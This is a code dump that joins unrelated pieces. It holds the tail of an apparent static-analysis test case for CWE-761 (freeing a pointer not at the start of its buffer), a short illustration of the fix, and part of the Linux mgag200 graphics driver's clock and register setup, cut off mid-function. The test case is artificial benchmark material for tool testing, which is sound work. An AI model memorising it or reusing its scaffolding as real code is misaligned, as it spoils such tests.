sockaddr_in s_in; char *replace; SOCKET listen_socket = INVALID_SOCKET; SOCKET accept_socket = INVALID_SOCKET; size_t data_len = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsa_data) != NO_ERROR) break; wsa_data_init = 1; #endif listen_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listen_socket == INVALID_SOCKET) break; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = INADDR_ANY; s_in.sin_port = htons(TCP_PORT); if (bind(listen_socket, (struct sockaddr*)&s_in, sizeof(s_in)) == SOCKET_ERROR) break; if (listen(listen_socket, LISTEN_BACKLOG) == SOCKET_ERROR) break; accept_socket = accept(listen_socket, NULL, NULL); if (accept_socket == SOCKET_ERROR) break; /* Abort on error or the connection was closed */ recv_rv = recv(accept_socket, (char *)data+data_len, (int)(100-data_len-1), 0); if (recv_rv == SOCKET_ERROR || recv_rv == 0) break; /* Append null terminator */ data[recv_rv] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) *replace = '\0'; replace = strchr(data, '\n'); if (replace) *replace = '\0'; } while (0); if (listen_socket != INVALID_SOCKET) CLOSE_SOCKET(listen_socket); if (accept_socket != INVALID_SOCKET) CLOSE_SOCKET(accept_socket); #ifdef _WIN32 if (wsa_data_init) WSACleanup(); #endif } goodB2G_sink(data); } void CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_good() { goodB2G(); } #endif /* OMITGOOD */ /* Below is the main(). It is only used when building this testcase on its own for testing or for building a binary to use in testing binary analysis tools. It is not used when compiling all the testcases as one application, which is how source code analysis tools are tested. */ #ifdef INCLUDEMAIN int main(int argc, char * argv[]) { /* seed randomness */ srand( (unsigned)time(NULL) ); #ifndef OMITGOOD printLine("Calling good()..."); CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_good(); printLine("Finished good()"); #endif /* OMITGOOD */ #ifndef OMITBAD printLine("Calling bad()..."); CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_bad(); printLine("Finished bad()"); #endif /* OMITBAD */ return 0; } #endif
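/*
 * Editor's illustration (not part of the test case above): the generic
 * CWE-761 fix is to leave the pointer returned by malloc() untouched and
 * scan through a separate cursor (or index, as goodB2G_sink() does), so
 * that free() always receives the start of the allocation. Minimal sketch
 * with hypothetical names:
 */
#include <stdlib.h>
#include <string.h>

static int contains_char(const char *buf, char c)
{
    const char *cursor; /* advance a copy, never the owning pointer */
    for (cursor = buf; *cursor != '\0'; cursor++)
    {
        if (*cursor == c)
            return 1;
    }
    return 0;
}

static void example(void)
{
    char *data = (char *)malloc(100);
    if (!data)
        return;
    strcpy(data, "Some String");
    (void)contains_char(data, 'S');
    free(data); /* OK: data still points to the start of the buffer */
}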
709041.c
// SPDX-License-Identifier: GPL-2.0-only /* * Copyright 2010 Matt Turner. * Copyright 2012 Red Hat * * Authors: Matthew Garrett * Matt Turner * Dave Airlie */ #include <linux/delay.h> #include <drm/drm_atomic_helper.h> #include <drm/drm_atomic_state_helper.h> #include <drm/drm_crtc_helper.h> #include <drm/drm_damage_helper.h> #include <drm/drm_format_helper.h> #include <drm/drm_fourcc.h> #include <drm/drm_gem_framebuffer_helper.h> #include <drm/drm_plane_helper.h> #include <drm/drm_print.h> #include <drm/drm_probe_helper.h> #include <drm/drm_simple_kms_helper.h> #include "mgag200_drv.h" #define MGAG200_LUT_SIZE 256 /* * This file contains setup code for the CRTC. */ static void mga_crtc_load_lut(struct drm_crtc *crtc) { struct drm_device *dev = crtc->dev; struct mga_device *mdev = to_mga_device(dev); struct drm_framebuffer *fb; u16 *r_ptr, *g_ptr, *b_ptr; int i; if (!crtc->enabled) return; if (!mdev->display_pipe.plane.state) return; fb = mdev->display_pipe.plane.state->fb; r_ptr = crtc->gamma_store; g_ptr = r_ptr + crtc->gamma_size; b_ptr = g_ptr + crtc->gamma_size; WREG8(DAC_INDEX + MGA1064_INDEX, 0); if (fb && fb->format->cpp[0] * 8 == 16) { int inc = (fb->format->depth == 15) ? 8 : 4; u8 r, b; for (i = 0; i < MGAG200_LUT_SIZE; i += inc) { if (fb->format->depth == 16) { if (i > (MGAG200_LUT_SIZE >> 1)) { r = b = 0; } else { r = *r_ptr++ >> 8; b = *b_ptr++ >> 8; r_ptr++; b_ptr++; } } else { r = *r_ptr++ >> 8; b = *b_ptr++ >> 8; } /* VGA registers */ WREG8(DAC_INDEX + MGA1064_COL_PAL, r); WREG8(DAC_INDEX + MGA1064_COL_PAL, *g_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, b); } return; } for (i = 0; i < MGAG200_LUT_SIZE; i++) { /* VGA registers */ WREG8(DAC_INDEX + MGA1064_COL_PAL, *r_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, *g_ptr++ >> 8); WREG8(DAC_INDEX + MGA1064_COL_PAL, *b_ptr++ >> 8); } } static inline void mga_wait_vsync(struct mga_device *mdev) { unsigned long timeout = jiffies + HZ/10; unsigned int status = 0; do { status = RREG32(MGAREG_Status); } while ((status & 0x08) && time_before(jiffies, timeout)); timeout = jiffies + HZ/10; status = 0; do { status = RREG32(MGAREG_Status); } while (!(status & 0x08) && time_before(jiffies, timeout)); } static inline void mga_wait_busy(struct mga_device *mdev) { unsigned long timeout = jiffies + HZ; unsigned int status = 0; do { status = RREG8(MGAREG_Status + 2); } while ((status & 0x01) && time_before(jiffies, timeout)); } /* * PLL setup */ static int mgag200_g200_set_plls(struct mga_device *mdev, long clock) { struct drm_device *dev = &mdev->base; const int post_div_max = 7; const int in_div_min = 1; const int in_div_max = 6; const int feed_div_min = 7; const int feed_div_max = 127; u8 testm, testn; u8 n = 0, m = 0, p, s; long f_vco; long computed; long delta, tmp_delta; long ref_clk = mdev->model.g200.ref_clk; long p_clk_min = mdev->model.g200.pclk_min; long p_clk_max = mdev->model.g200.pclk_max; if (clock > p_clk_max) { drm_err(dev, "Pixel Clock %ld too high\n", clock); return 1; } if (clock < p_clk_min >> 3) clock = p_clk_min >> 3; f_vco = clock; for (p = 0; p <= post_div_max && f_vco < p_clk_min; p = (p << 1) + 1, f_vco <<= 1) ; delta = clock; for (testm = in_div_min; testm <= in_div_max; testm++) { for (testn = feed_div_min; testn <= feed_div_max; testn++) { computed = ref_clk * (testn + 1) / (testm + 1); if (computed < f_vco) tmp_delta = f_vco - computed; else tmp_delta = computed - f_vco; if (tmp_delta < delta) { delta = tmp_delta; m = testm; n = testn; } } } f_vco = ref_clk * (n + 1) / (m + 1); if (f_vco < 100000) s = 0; 
    else if (f_vco < 140000)
        s = 1;
    else if (f_vco < 180000)
        s = 2;
    else
        s = 3;

    drm_dbg_kms(dev, "clock: %ld vco: %ld m: %d n: %d p: %d s: %d\n",
                clock, f_vco, m, n, p, s);

    WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK);

    WREG_DAC(MGA1064_PIX_PLLC_M, m);
    WREG_DAC(MGA1064_PIX_PLLC_N, n);
    WREG_DAC(MGA1064_PIX_PLLC_P, (p | (s << 3)));

    return 0;
}

#define P_ARRAY_SIZE 9

static int mga_g200se_set_plls(struct mga_device *mdev, long clock)
{
    u32 unique_rev_id = mdev->model.g200se.unique_rev_id;
    unsigned int vcomax, vcomin, pllreffreq;
    unsigned int delta, tmpdelta, permitteddelta;
    unsigned int testp, testm, testn;
    unsigned int p, m, n;
    unsigned int computed;
    unsigned int pvalues_e4[P_ARRAY_SIZE] = {16, 14, 12, 10, 8, 6, 4, 2, 1};
    unsigned int fvv;
    unsigned int i;

    if (unique_rev_id <= 0x03) {
        m = n = p = 0;
        vcomax = 320000;
        vcomin = 160000;
        pllreffreq = 25000;

        delta = 0xffffffff;
        permitteddelta = clock * 5 / 1000;

        for (testp = 8; testp > 0; testp /= 2) {
            if (clock * testp > vcomax)
                continue;
            if (clock * testp < vcomin)
                continue;

            for (testn = 17; testn < 256; testn++) {
                for (testm = 1; testm < 32; testm++) {
                    computed = (pllreffreq * testn) / (testm * testp);
                    if (computed > clock)
                        tmpdelta = computed - clock;
                    else
                        tmpdelta = clock - computed;
                    if (tmpdelta < delta) {
                        delta = tmpdelta;
                        m = testm - 1;
                        n = testn - 1;
                        p = testp - 1;
                    }
                }
            }
        }
    } else {
        m = n = p = 0;
        vcomax = 1600000;
        vcomin = 800000;
        pllreffreq = 25000;

        if (clock < 25000)
            clock = 25000;
        clock = clock * 2;

        delta = 0xFFFFFFFF;
        /* Permitted delta is 0.5%, per the VESA specification */
        permitteddelta = clock * 5 / 1000;

        for (i = 0 ; i < P_ARRAY_SIZE ; i++) {
            testp = pvalues_e4[i];

            if ((clock * testp) > vcomax)
                continue;
            if ((clock * testp) < vcomin)
                continue;

            for (testn = 50; testn <= 256; testn++) {
                for (testm = 1; testm <= 32; testm++) {
                    computed = (pllreffreq * testn) / (testm * testp);
                    if (computed > clock)
                        tmpdelta = computed - clock;
                    else
                        tmpdelta = clock - computed;

                    if (tmpdelta < delta) {
                        delta = tmpdelta;
                        m = testm - 1;
                        n = testn - 1;
                        p = testp - 1;
                    }
                }
            }
        }

        fvv = pllreffreq * (n + 1) / (m + 1);
        fvv = (fvv - 800000) / 50000;
        if (fvv > 15)
            fvv = 15;
        p |= (fvv << 4);
        m |= 0x80;

        clock = clock / 2;
    }

    if (delta > permitteddelta) {
        pr_warn("PLL delta too large\n");
        return 1;
    }

    WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK);

    WREG_DAC(MGA1064_PIX_PLLC_M, m);
    WREG_DAC(MGA1064_PIX_PLLC_N, n);
    WREG_DAC(MGA1064_PIX_PLLC_P, p);

    if (unique_rev_id >= 0x04) {
        WREG_DAC(0x1a, 0x09);
        msleep(20);
        WREG_DAC(0x1a, 0x01);
    }

    return 0;
}

static int mga_g200wb_set_plls(struct mga_device *mdev, long clock)
{
    unsigned int vcomax, vcomin, pllreffreq;
    unsigned int delta, tmpdelta;
    unsigned int testp, testm, testn, testp2;
    unsigned int p, m, n;
    unsigned int computed;
    int i, j, tmpcount, vcount;
    bool pll_locked = false;
    u8 tmp;

    m = n = p = 0;
    delta = 0xffffffff;

    if (mdev->type == G200_EW3) {
        vcomax = 800000;
        vcomin = 400000;
        pllreffreq = 25000;

        for (testp = 1; testp < 8; testp++) {
            for (testp2 = 1; testp2 < 8; testp2++) {
                if (testp < testp2)
                    continue;
                if ((clock * testp * testp2) > vcomax)
                    continue;
                if ((clock * testp * testp2) < vcomin)
                    continue;
                for (testm = 1; testm < 26; testm++) {
                    for (testn = 32; testn < 2048 ; testn++) {
                        computed = (pllreffreq * testn) /
                            (testm * testp * testp2);
                        if (computed > clock)
                            tmpdelta = computed - clock;
                        else
                            tmpdelta = clock - computed;
                        if (tmpdelta < delta) {
                            delta = tmpdelta;
                            m = ((testn & 0x100) >> 1) | (testm);
                            n = (testn & 0xFF);
                            p = ((testn & 0x600) >> 3) | (testp2 << 3) | (testp);
                        }
                    }
                }
            }
        }
    } else {
vcomax = 550000; vcomin = 150000; pllreffreq = 48000; for (testp = 1; testp < 9; testp++) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testm = 1; testm < 17; testm++) { for (testn = 1; testn < 151; testn++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = (testm - 1) | ((n >> 1) & 0x80); p = testp - 1; } } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); for (i = 0; i <= 32 && pll_locked == false; i++) { if (i > 0) { WREG8(MGAREG_CRTC_INDEX, 0x1e); tmp = RREG8(MGAREG_CRTC_DATA); if (tmp < 0xff) WREG8(MGAREG_CRTC_DATA, tmp+1); } /* set pixclkdis to 1 */ WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_REMHEADCTL_CLKDIS; WREG8(DAC_DATA, tmp); /* select PLL Set C */ tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN | 0x80; WREG8(DAC_DATA, tmp); udelay(500); /* reset the PLL */ WREG8(DAC_INDEX, MGA1064_VREF_CTL); tmp = RREG8(DAC_DATA); tmp &= ~0x04; WREG8(DAC_DATA, tmp); udelay(50); /* program pixel pll register */ WREG_DAC(MGA1064_WB_PIX_PLLC_N, n); WREG_DAC(MGA1064_WB_PIX_PLLC_M, m); WREG_DAC(MGA1064_WB_PIX_PLLC_P, p); udelay(50); /* turn pll on */ WREG8(DAC_INDEX, MGA1064_VREF_CTL); tmp = RREG8(DAC_DATA); tmp |= 0x04; WREG_DAC(MGA1064_VREF_CTL, tmp); udelay(500); /* select the pixel pll */ WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_REMHEADCTL_CLKSL_MSK; tmp |= MGA1064_REMHEADCTL_CLKSL_PLL; WREG8(DAC_DATA, tmp); /* reset dotclock rate bit */ WREG8(MGAREG_SEQ_INDEX, 1); tmp = RREG8(MGAREG_SEQ_DATA); tmp &= ~0x8; WREG8(MGAREG_SEQ_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); vcount = RREG8(MGAREG_VCOUNT); for (j = 0; j < 30 && pll_locked == false; j++) { tmpcount = RREG8(MGAREG_VCOUNT); if (tmpcount < vcount) vcount = 0; if ((tmpcount - vcount) > 2) pll_locked = true; else udelay(5); } } WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_REMHEADCTL_CLKDIS; WREG_DAC(MGA1064_REMHEADCTL, tmp); return 0; } static int mga_g200ev_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; unsigned int testp, testm, testn; unsigned int p, m, n; unsigned int computed; u8 tmp; m = n = p = 0; vcomax = 550000; vcomin = 150000; pllreffreq = 50000; delta = 0xffffffff; for (testp = 16; testp > 0; testp--) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testn = 1; testn < 257; testn++) { for (testm = 1; testm < 17; testm++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = testm - 1; p = testp - 1; } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, 
tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_PLL_STAT); tmp = RREG8(DAC_DATA); WREG8(DAC_DATA, tmp & ~0x40); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); WREG_DAC(MGA1064_EV_PIX_PLLC_M, m); WREG_DAC(MGA1064_EV_PIX_PLLC_N, n); WREG_DAC(MGA1064_EV_PIX_PLLC_P, p); udelay(50); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_PLL_STAT); tmp = RREG8(DAC_DATA); WREG8(DAC_DATA, tmp | 0x40); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= (0x3 << 2); WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); return 0; } static int mga_g200eh_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; unsigned int testp, testm, testn; unsigned int p, m, n; unsigned int computed; int i, j, tmpcount, vcount; u8 tmp; bool pll_locked = false; m = n = p = 0; if (mdev->type == G200_EH3) { vcomax = 3000000; vcomin = 1500000; pllreffreq = 25000; delta = 0xffffffff; testp = 0; for (testm = 150; testm >= 6; testm--) { if (clock * testm > vcomax) continue; if (clock * testm < vcomin) continue; for (testn = 120; testn >= 60; testn--) { computed = (pllreffreq * testn) / testm; if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn; m = testm; p = testp; } if (delta == 0) break; } if (delta == 0) break; } } else { vcomax = 800000; vcomin = 400000; pllreffreq = 33333; delta = 0xffffffff; for (testp = 16; testp > 0; testp >>= 1) { if (clock * testp > vcomax) continue; if (clock * testp < vcomin) continue; for (testm = 1; testm < 33; testm++) { for (testn = 17; testn < 257; testn++) { computed = (pllreffreq * testn) / (testm * testp); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; n = testn - 1; m = (testm - 1); p = testp - 1; } if ((clock * testp) >= 600000) p |= 0x80; } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); for (i = 0; i <= 32 && pll_locked == false; i++) { WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= 0x3 << 2; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG_DAC(MGA1064_EH_PIX_PLLC_M, m); WREG_DAC(MGA1064_EH_PIX_PLLC_N, n); WREG_DAC(MGA1064_EH_PIX_PLLC_P, p); udelay(500); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_SEL_MSK; tmp |= MGA1064_PIX_CLK_CTL_SEL_PLL; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; tmp &= ~MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); vcount = RREG8(MGAREG_VCOUNT); for (j = 0; j < 30 && pll_locked == false; j++) { tmpcount = RREG8(MGAREG_VCOUNT); if (tmpcount < vcount) vcount = 0; if ((tmpcount - vcount) > 2) pll_locked = true; else udelay(5); } } return 
0; } static int mga_g200er_set_plls(struct mga_device *mdev, long clock) { unsigned int vcomax, vcomin, pllreffreq; unsigned int delta, tmpdelta; int testr, testn, testm, testo; unsigned int p, m, n; unsigned int computed, vco; int tmp; const unsigned int m_div_val[] = { 1, 2, 4, 8 }; m = n = p = 0; vcomax = 1488000; vcomin = 1056000; pllreffreq = 48000; delta = 0xffffffff; for (testr = 0; testr < 4; testr++) { if (delta == 0) break; for (testn = 5; testn < 129; testn++) { if (delta == 0) break; for (testm = 3; testm >= 0; testm--) { if (delta == 0) break; for (testo = 5; testo < 33; testo++) { vco = pllreffreq * (testn + 1) / (testr + 1); if (vco < vcomin) continue; if (vco > vcomax) continue; computed = vco / (m_div_val[testm] * (testo + 1)); if (computed > clock) tmpdelta = computed - clock; else tmpdelta = clock - computed; if (tmpdelta < delta) { delta = tmpdelta; m = testm | (testo << 3); n = testn; p = testr | (testr << 3); } } } } } WREG_MISC_MASKED(MGAREG_MISC_CLKSEL_MGA, MGAREG_MISC_CLKSEL_MASK); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_PIX_CLK_CTL_CLK_DIS; WREG8(DAC_DATA, tmp); WREG8(DAC_INDEX, MGA1064_REMHEADCTL); tmp = RREG8(DAC_DATA); tmp |= MGA1064_REMHEADCTL_CLKDIS; WREG8(DAC_DATA, tmp); tmp = RREG8(MGAREG_MEM_MISC_READ); tmp |= (0x3<<2) | 0xc0; WREG8(MGAREG_MEM_MISC_WRITE, tmp); WREG8(DAC_INDEX, MGA1064_PIX_CLK_CTL); tmp = RREG8(DAC_DATA); tmp &= ~MGA1064_PIX_CLK_CTL_CLK_DIS; tmp |= MGA1064_PIX_CLK_CTL_CLK_POW_DOWN; WREG8(DAC_DATA, tmp); udelay(500); WREG_DAC(MGA1064_ER_PIX_PLLC_N, n); WREG_DAC(MGA1064_ER_PIX_PLLC_M, m); WREG_DAC(MGA1064_ER_PIX_PLLC_P, p); udelay(50); return 0; } static int mgag200_crtc_set_plls(struct mga_device *mdev, long clock) { switch(mdev->type) { case G200_PCI: case G200_AGP: return mgag200_g200_set_plls(mdev, clock); case G200_SE_A: case G200_SE_B: return mga_g200se_set_plls(mdev, clock); break; case G200_WB: case G200_EW3: return mga_g200wb_set_plls(mdev, clock); break; case G200_EV: return mga_g200ev_set_plls(mdev, clock); break; case G200_EH: case G200_EH3: return mga_g200eh_set_plls(mdev, clock); break; case G200_ER: return mga_g200er_set_plls(mdev, clock); break; } return 0; } static void mgag200_g200wb_hold_bmc(struct mga_device *mdev) { u8 tmp; int iter_max; /* 1- The first step is to warn the BMC of an upcoming mode change. 
     * We are putting the misc<0> to output. */
    WREG8(DAC_INDEX, MGA1064_GEN_IO_CTL);
    tmp = RREG8(DAC_DATA);
    tmp |= 0x10;
    WREG_DAC(MGA1064_GEN_IO_CTL, tmp);

    /* we are putting a 1 on the misc<0> line */
    WREG8(DAC_INDEX, MGA1064_GEN_IO_DATA);
    tmp = RREG8(DAC_DATA);
    tmp |= 0x10;
    WREG_DAC(MGA1064_GEN_IO_DATA, tmp);

    /* 2- The second step is to mask any further scan request.
     * This will be done by asserting the remfreqmsk bit (XSPAREREG<7>).
     */
    WREG8(DAC_INDEX, MGA1064_SPAREREG);
    tmp = RREG8(DAC_DATA);
    tmp |= 0x80;
    WREG_DAC(MGA1064_SPAREREG, tmp);

    /* 3a- The third step is to verify if there is an active scan.
     * We are searching for a 0 on remhsyncsts (XSPAREREG<0>).
     */
    iter_max = 300;
    while (!(tmp & 0x1) && iter_max) {
        WREG8(DAC_INDEX, MGA1064_SPAREREG);
        tmp = RREG8(DAC_DATA);
        udelay(1000);
        iter_max--;
    }

    /* 3b- This step occurs only if the remote is actually scanning.
     * We are waiting for the end of the frame, which is a 1 on
     * remvsyncsts (XSPAREREG<1>).
     */
    if (iter_max) {
        iter_max = 300;
        while ((tmp & 0x2) && iter_max) {
            WREG8(DAC_INDEX, MGA1064_SPAREREG);
            tmp = RREG8(DAC_DATA);
            udelay(1000);
            iter_max--;
        }
    }
}

static void mgag200_g200wb_release_bmc(struct mga_device *mdev)
{
    u8 tmp;

    /* 1- The first step is to ensure that the vrsten and hrsten are set */
    WREG8(MGAREG_CRTCEXT_INDEX, 1);
    tmp = RREG8(MGAREG_CRTCEXT_DATA);
    WREG8(MGAREG_CRTCEXT_DATA, tmp | 0x88);

    /* 2- second step is to assert the rstlvl2 */
    WREG8(DAC_INDEX, MGA1064_REMHEADCTL2);
    tmp = RREG8(DAC_DATA);
    tmp |= 0x8;
    WREG8(DAC_DATA, tmp);

    /* wait 10 us */
    udelay(10);

    /* 3- deassert rstlvl2 */
    tmp &= ~0x08;
    WREG8(DAC_INDEX, MGA1064_REMHEADCTL2);
    WREG8(DAC_DATA, tmp);

    /* 4- remove mask of scan request */
    WREG8(DAC_INDEX, MGA1064_SPAREREG);
    tmp = RREG8(DAC_DATA);
    tmp &= ~0x80;
    WREG8(DAC_DATA, tmp);

    /* 5- put back a 0 on the misc<0> line */
    WREG8(DAC_INDEX, MGA1064_GEN_IO_DATA);
    tmp = RREG8(DAC_DATA);
    tmp &= ~0x10;
    WREG_DAC(MGA1064_GEN_IO_DATA, tmp);
}

/*
 * This is how the framebuffer base address is stored in g200 cards:
 *
 * Assume @offset is the gpu_addr variable of the framebuffer object
 *
 * Then addr is the number of _pixels_ (not bytes) from the start of
 * VRAM to the first pixel we want to display. (divided by 2 for 32bit
 * framebuffers)
 *
 * addr is stored in the CRTCEXT0, CRTCC and CRTCD registers
 * addr<20> -> CRTCEXT0<6>
 * addr<19-16> -> CRTCEXT0<3-0>
 * addr<15-8> -> CRTCC<7-0>
 * addr<7-0> -> CRTCD<7-0>
 *
 * CRTCEXT0 has to be programmed last to trigger an update and make the
 * new addr variable take effect.
 */
static void mgag200_set_startadd(struct mga_device *mdev,
                                 unsigned long offset)
{
    struct drm_device *dev = &mdev->base;
    u32 startadd;
    u8 crtcc, crtcd, crtcext0;

    startadd = offset / 8;

    /*
     * Can't store addresses any higher than that, but we also
     * don't have more than 16 MiB of memory, so it should be fine.
*/ drm_WARN_ON(dev, startadd > 0x1fffff); RREG_ECRT(0x00, crtcext0); crtcc = (startadd >> 8) & 0xff; crtcd = startadd & 0xff; crtcext0 &= 0xb0; crtcext0 |= ((startadd >> 14) & BIT(6)) | ((startadd >> 16) & 0x0f); WREG_CRT(0x0c, crtcc); WREG_CRT(0x0d, crtcd); WREG_ECRT(0x00, crtcext0); } static void mgag200_set_dac_regs(struct mga_device *mdev) { size_t i; u8 dacvalue[] = { /* 0x00: */ 0, 0, 0, 0, 0, 0, 0x00, 0, /* 0x08: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x10: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x18: */ 0x00, 0, 0xC9, 0xFF, 0xBF, 0x20, 0x1F, 0x20, /* 0x20: */ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* 0x28: */ 0x00, 0x00, 0x00, 0x00, 0, 0, 0, 0x40, /* 0x30: */ 0x00, 0xB0, 0x00, 0xC2, 0x34, 0x14, 0x02, 0x83, /* 0x38: */ 0x00, 0x93, 0x00, 0x77, 0x00, 0x00, 0x00, 0x3A, /* 0x40: */ 0, 0, 0, 0, 0, 0, 0, 0, /* 0x48: */ 0, 0, 0, 0, 0, 0, 0, 0 }; switch (mdev->type) { case G200_PCI: case G200_AGP: dacvalue[MGA1064_SYS_PLL_M] = 0x04; dacvalue[MGA1064_SYS_PLL_N] = 0x2D; dacvalue[MGA1064_SYS_PLL_P] = 0x19; break; case G200_SE_A: case G200_SE_B: dacvalue[MGA1064_VREF_CTL] = 0x03; dacvalue[MGA1064_PIX_CLK_CTL] = MGA1064_PIX_CLK_CTL_SEL_PLL; dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_DAC_EN | MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_WB: case G200_EW3: dacvalue[MGA1064_VREF_CTL] = 0x07; break; case G200_EV: dacvalue[MGA1064_PIX_CLK_CTL] = MGA1064_PIX_CLK_CTL_SEL_PLL; dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_EH: case G200_EH3: dacvalue[MGA1064_MISC_CTL] = MGA1064_MISC_CTL_VGA8 | MGA1064_MISC_CTL_DAC_RAM_CS; break; case G200_ER: break; } for (i = 0; i < ARRAY_SIZE(dacvalue); i++) { if ((i <= 0x17) || (i == 0x1b) || (i == 0x1c) || ((i >= 0x1f) && (i <= 0x29)) || ((i >= 0x30) && (i <= 0x37))) continue; if (IS_G200_SE(mdev) && ((i == 0x2c) || (i == 0x2d) || (i == 0x2e))) continue; if ((mdev->type == G200_EV || mdev->type == G200_WB || mdev->type == G200_EH || mdev->type == G200_EW3 || mdev->type == G200_EH3) && (i >= 0x44) && (i <= 0x4e)) continue; WREG_DAC(i, dacvalue[i]); } if (mdev->type == G200_ER) WREG_DAC(0x90, 0); } static void mgag200_init_regs(struct mga_device *mdev) { u8 crtc11, misc; mgag200_set_dac_regs(mdev); WREG_SEQ(2, 0x0f); WREG_SEQ(3, 0x00); WREG_SEQ(4, 0x0e); WREG_CRT(10, 0); WREG_CRT(11, 0); WREG_CRT(12, 0); 